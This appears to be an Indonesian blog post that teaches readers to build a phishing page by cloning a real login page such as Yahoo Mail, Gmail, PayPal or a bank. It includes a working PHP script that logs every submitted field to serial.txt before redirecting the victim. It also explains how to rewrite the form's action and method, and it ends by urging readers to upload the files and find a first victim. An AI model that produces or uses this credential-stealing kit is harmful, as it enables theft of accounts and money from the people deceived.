Ha..ha, saya sepertinya sudah gila menerbitkan artikel-artikel yang seharusnya tidak layak dipublikasikan. Tapi tidak mengapalah, saya hanya menyalurkan ide yang tidak bisa selamanya saya simpan dalam kepala penuh dosa ini. Ha3x... Teknik pencurian password menggunakan fake login atau lebih dikenal dengan nama phising . Nah bagi yang mau bereksperimen sendiri dengan berbagai halaman login palsu misalnya yahoo mail, gmail, paypal, ebay, atau bahkan account sebuah Bank? silakan dicoba disini ha3x....Langkah pertama yang dilakukan adalah masuk ke halaman login situs yang menjadi target misalnya yahoo mail. Save Page As (default untuk firefox) atau simpan seluruh halaman secara komplit pada sebuah folder terpisah (misalkan beri nama folder mail). Kamu akan mendapatkan satu buah file html dan sebuah folder yang berisi image dan file lainya. Nah selanjutnya ganti nama file HTML menjadi index.html
Masih pada folder yang sama, buat sebuah file baru dan beri nama serial.txt. Kemudian buah sebuah file php dengan code script di bawah ini. Kemudian Simpan dengan nama login.php. Pastikan kode warna merah diganti dengan nama domain tempat penyimpanan file fake login tersebut.
<?php
Header("Location: http://nama-domain.com");
$handle = fopen("serial.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Langkah berikutnya adalah buka file index.html yang tadi menggunakan text editor. Kemudian cari code yang mengarahkan Form login biasanya diindikasikan dengan nama <form></form> Kemudian ganti action ke file login.php yang telah dibuat dan ganti method menjadi GET. Kira-kira hasilnya menjadi seperti ini:
<form action ="http://nama-domain.com" method="get"></form>
Jika sudah, upload semua file tersebut kedalam hosting kamu sendiri dan mulailah mencari target phising sebagai korban pertama anda.. ha3x... Selamat Mencoba
Komentar